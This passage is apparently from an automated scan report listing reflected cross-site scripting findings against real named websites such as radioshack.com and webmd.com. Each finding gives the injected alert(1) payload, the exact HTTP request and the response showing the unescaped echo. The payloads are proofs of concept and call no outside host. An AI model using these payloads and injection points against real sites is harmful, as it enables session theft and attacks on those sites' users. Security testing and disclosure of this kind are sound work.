s_265.t
...[SNIP]...

3.112. http://www.radioshack.com/uc/index.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.radioshack.com
Path:   /uc/index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ce8fa--><script>alert(1)</script>3f295dd3b3c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /uc/index.jsp?ce8fa--><script>alert(1)</script>3f295dd3b3c=1 HTTP/1.1
Host: www.radioshack.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:01 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
Content-Length: 42182
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=3yLhNrlZtSnSQsJM1JjRX0TTLphGYJhsK7kj4fhGYPYcYDd6L465!1257230759; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: browser_id=126388974473; expires=Thursday, 25-Feb-2021 13:38:01 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->


<!DOCT
...[SNIP]...
<!-- === Request Query String: isInSecureMode=false&pageType=uc&ce8fa--><script>alert(1)</script>3f295dd3b3c=1 -->
...[SNIP]...

3.113. http://www.shelterpop.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shelterpop.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21c44"><script>alert(1)</script>1c4106e9fe4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?21c44"><script>alert(1)</script>1c4106e9fe4=1 HTTP/1.1
Host: www.shelterpop.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:59 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999453
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 52762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="
...[SNIP]...
<link rel="canonical" href="http://www.shelterpop.com/?21c44"><script>alert(1)</script>1c4106e9fe4=1" />
...[SNIP]...

3.114. http://www.shoppinga.de/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.shoppinga.de
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f935b"><script>alert(1)</script>f3d7e91300c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f935b"><script>alert(1)</script>f3d7e91300c=1 HTTP/1.1
Host: www.shoppinga.de
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:15 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=b2ir2jthkv6rs54hublpq35uklnph9k5; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62123

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN">

<html dir="ltr" lang="de">
   <head>
<meta name="msvalidate.01" content="C0594E2AB82AE90F82DE0425FCA782B9" />
   
...[SNIP]...
<a href="/f935b"><script>alert(1)</script>f3d7e91300c/1/page/2">
...[SNIP]...

3.115. http://www.skiamis.com/catered-search.htm [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.skiamis.com
Path:   /catered-search.htm

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3f38"><script>alert(1)</script>a2ac421e162 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /catered-search.htm?e3f38"><script>alert(1)</script>a2ac421e162=1 HTTP/1.1
Host: www.skiamis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:32 GMT
Server: Apache
Set-Cookie: PHPSESSID=9ce535a0444e5bdd797d265178a6e587; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 34407

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<script type="
...[SNIP]...
<form action="/catered-search.htm?e3f38"><script>alert(1)</script>a2ac421e162=1&" method="get" id="frm_quick_search">
...[SNIP]...

3.116. http://www.slashfood.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slashfood.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fa65"><script>alert(1)</script>553d4947f9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?5fa65"><script>alert(1)</script>553d4947f9f=1 HTTP/1.1
Host: www.slashfood.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:04 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Keep-Alive: timeout=5, max=999652
Connection: Keep-Alive
Content-Type: text/html
X-Pad: avoid browser bug
Content-Length: 60539

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-ty
...[SNIP]...
<link rel="canonical" href="http://www.slashfood.com/?5fa65"><script>alert(1)</script>553d4947f9f=1" />
...[SNIP]...

3.117. http://www.smartphonetoday.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartphonetoday.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 617c7--><script>alert(1)</script>a9b4df00f0e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?617c7--><script>alert(1)</script>a9b4df00f0e=1 HTTP/1.1
Host: www.smartphonetoday.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:12 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:39:12 GMT
Connection: close
Content-Type: text/html
Content-Length: 83830

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE>SmartPhone Today - The Complete Independent SmartPhone Information Resource </TITLE>
<META name="description" content="The Inte
...[SNIP]...
<!-- marketplace04: Missing QUAD ads for page_type: other on path www.smartphonetoday.com with position E1
url: /?617c7--><script>alert(1)</script>a9b4df00f0e=1 -->
...[SNIP]...

3.118. http://www.spiele365.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.spiele365.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7ffe"><script>alert(1)</script>d4be2e94b49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?f7ffe"><script>alert(1)</script>d4be2e94b49=1 HTTP/1.1
Host: www.spiele365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:13 GMT
Server: Apache/2.2.10 (Linux/SUSE)
X-Powered-By: PHP/5.2.11
Set-Cookie: PHPSESSID=qdgrtcbcd31em2bbrdjhaiae9kdgqln7; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 24236


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content
...[SNIP]...
<input type="hidden" name="return" value="/?f7ffe"><script>alert(1)</script>d4be2e94b49=1" />
...[SNIP]...

3.119. http://www.sportspickle.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sportspickle.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53bd0"-alert(1)-"c72d172abf7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?53bd0"-alert(1)-"c72d172abf7=1 HTTP/1.1
Host: www.sportspickle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:37:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.3.2
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: jument_hash=deleted; expires=Sun, 28-Feb-2010 13:37:17 GMT; path=/; domain=sportspickle.com
Set-Cookie: jument_hash=5901b0c09c4bf54a95b4b12c3fffe946777c8aac; expires=Sun, 28-Feb-2016 18:41:08 GMT; path=/; domain=sportspickle.com
Set-Cookie: jument_hash=5901b0c09c4bf54a95b4b12c3fffe946777c8aac; expires=Sun, 28-Feb-2016 18:41:08 GMT; path=/; domain=sportspickle.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 37761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd" xmlns:fb="http://www.facebook.com/2008/fbml">
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
d_site = "5480.iac.sportspickle";
jument.cookie.domain = "sportspickle.com";
jument.home_url = "http://www.sportspickle.com";
jument.this_url = "http://www.sportspickle.com/?53bd0"-alert(1)-"c72d172abf7=1";
jument.user_id = 0;
</script>
...[SNIP]...

3.120. http://www.surf-forecast.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.surf-forecast.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d17b"><script>alert(1)</script>57409e08fbc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?4d17b"><script>alert(1)</script>57409e08fbc=1 HTTP/1.1
Host: www.surf-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 28 Feb 2011 13:38:51 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "8ac6fe53e128f1ccb2b3b4e8f394af59"
X-Runtime: 519
Content-Length: 40974
Set-Cookie: _surf-forecast.com_session=BAh7BzoPc2Vzc2lvbl9pZCIlZGNlOWRkM2IzYTRkNDk5ZTBiOTU1ZmFjYjA0YzdjMDQ6EF9jc3JmX3Rva2VuIjF6R21nWmQ3bXp1VjQrcWx4ZWs2V21sMElYaVltOXc0SGk0UElmUks1WDdnPQ%3D%3D--bdefdfcb4f93ddc239ed67e22fdd402dd9c1f26f; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...
<a href="http://fr.surf-forecast.com/?4d17b"><script>alert(1)</script>57409e08fbc=1">
...[SNIP]...

3.121. http://www.thecounter.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thecounter.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 6c34a--><script>alert(1)</script>1686bde097f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?6c34a--><script>alert(1)</script>1686bde097f=1 HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:18 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 41200

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<!-- : Missing QUAD ads for page_type: other on path www.thecounter.com with position ciu
url: /?6c34a--><script>alert(1)</script>1686bde097f=1 -->
...[SNIP]...

3.122. http://www.thelist.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thelist.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ba2a1--><script>alert(1)</script>4b281671d11 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?ba2a1--><script>alert(1)</script>4b281671d11=1 HTTP/1.1
Host: www.thelist.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:06 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Mon, 28 Feb 2011 13:40:06 GMT
Connection: close
Content-Type: text/html
Content-Length: 43623

<HTML>
<HEAD>
<TITLE>The List: The Definitive Internet Services Buyer's Guide</TITLE>
<META NAME="description" CONTENT="Find an ISP that fits your internet access needs on TheList.com. TheList.com is
...[SNIP]...
<!-- sitetext-1: Missing QUAD ads for page_type: other on path www.thelist.com with position S1
url: /?ba2a1--><script>alert(1)</script>4b281671d11=1 -->
...[SNIP]...

3.123. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thesuperficial.com
Path:   /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57092"><script>alert(1)</script>9bb8ad4f141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 57092\"><script>alert(1)</script>9bb8ad4f141 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?57092"><script>alert(1)</script>9bb8ad4f141=1 HTTP/1.1
Host: www.thesuperficial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:09 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.thesuperficial.com
X-Powered-By: PHP/5.3.5
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.thesuperficial.com/xmlrpc.php
Last-Modified: Mon, 28 Feb 2011 08:39:10 -0500
Cache-Control: max-age=300, must-revalidate
X-RSID: 172.20.21.34
Keep-Alive: timeout=5, max=7
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 68367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe class="fbook-iframe" src="http://www.facebook.com/plugins/like.php?href=http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?57092\"><script>alert(1)</script>9bb8ad4f141=1&amp;layout=standard&amp;show_faces=false&amp;width=&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=20" scrolling="no" frameborder="0" style="border:none; overflow:visible; width:100
...[SNIP]...

3.124. http://www.thesuperficial.com/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thesuperficial.com
Path:   /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce4da"><script>alert(1)</script>2b52a4edbc2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ce4da\"><script>alert(1)</script>2b52a4edbc2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?ce4da"><script>alert(1)</script>2b52a4edbc2=1 HTTP/1.1
Host: www.thesuperficial.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:59 GMT
Server: Apache
Set-Cookie: GEOIP_COUNTRY_CODE=US; path=/; domain=www.thesuperficial.com
X-Powered-By: PHP/5.3.5
Vary: Cookie,Accept-Encoding
X-Pingback: http://www.thesuperficial.com/xmlrpc.php
Last-Modified: Mon, 28 Feb 2011 08:38:59 -0500
Cache-Control: max-age=300, must-revalidate
X-RSID: 192.168.21.79
Keep-Alive: timeout=5, max=3
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 68367

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<input type="hidden" name="redirect_to" value="/sarah-shahi-worlds-sexiest-melding-pot-02-2011/0203-sarah-shahi-07?ce4da\"><script>alert(1)</script>2b52a4edbc2=1" />
...[SNIP]...

3.125. http://www.u-tokyo.ac.jp/index_e.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.u-tokyo.ac.jp
Path:   /index_e.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fefe6"><script>alert(1)</script>050ad9e4b1a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index_e.html?fefe6"><script>alert(1)</script>050ad9e4b1a=1 HTTP/1.1
Host: www.u-tokyo.ac.jp
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:50 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8b PHP/5.2.8
X-Powered-By: PHP/5.2.8
Connection: close
Content-Type: text/html
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en"><head>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8"
...[SNIP]...
<a href="./index_j.html?fefe6"><script>alert(1)</script>050ad9e4b1a=1">
...[SNIP]...

3.126. http://www.vbforums.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vbforums.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 865b9--><script>alert(1)</script>35578bc47d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?865b9--><script>alert(1)</script>35578bc47d=1 HTTP/1.1
Host: www.vbforums.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:10 GMT
Server: Apache
Set-Cookie: bblastvisit=1298900350; expires=Tue, 28-Feb-12 13:39:10 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Tue, 28-Feb-12 13:39:10 GMT; path=/
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
X-UA-Compatible: IE=7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 158096

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
   <!-
...[SNIP]...
<!-- sponsor-20: Missing QUAD ads for page_type: other on path www.vbforums.com with position E1
url: /?865b9--><script>alert(1)</script>35578bc47d=1 -->
...[SNIP]...

3.127. http://www.watchmouse.com/en/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 83de0'-alert(1)-'1dc77df686f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en83de0'-alert(1)-'1dc77df686f/ HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Mon, 28 Feb 2011 13:39:06 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-2aca6812130e43ea77f713d17a012f8a"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::en83de0'-alert(1)-'1dc77df686f');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsRef
...[SNIP]...

3.128. http://www.watchmouse.com/en/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa224'-alert(1)-'8f9e5a9810e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/?fa224'-alert(1)-'8f9e5a9810e=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:38:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
ETag: "0-en-e5304cca9addcdac74df6dc7c9398250"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::::?fa224'-alert(1)-'8f9e5a9810e=1');
           var serverRef = encodeURIComponent('');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referrer);
           }else{
               jsRef = '';
           }
           requestParams = 'vjsRef='+jsR
...[SNIP]...

3.129. http://www.webmd.com/click [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.webmd.com
Path:   /click

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98685"-alert(1)-"8e8d2566d57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /click?98685"-alert(1)-"8e8d2566d57=1 HTTP/1.1
Host: www.webmd.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: brand=mywebmd; domain=.webmd.com; path=/
Set-Cookie: VisitorId=d8eaf777-26e1-4517-a6d5-6b99e834cb0f; domain=.webmd.com; expires=Sun, 28-Feb-2021 13:39:00 GMT; path=/
Set-Cookie: refpath=; domain=.webmd.com; path=/
Set-Cookie: webmd_geoLoc=; domain=webmd.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4567


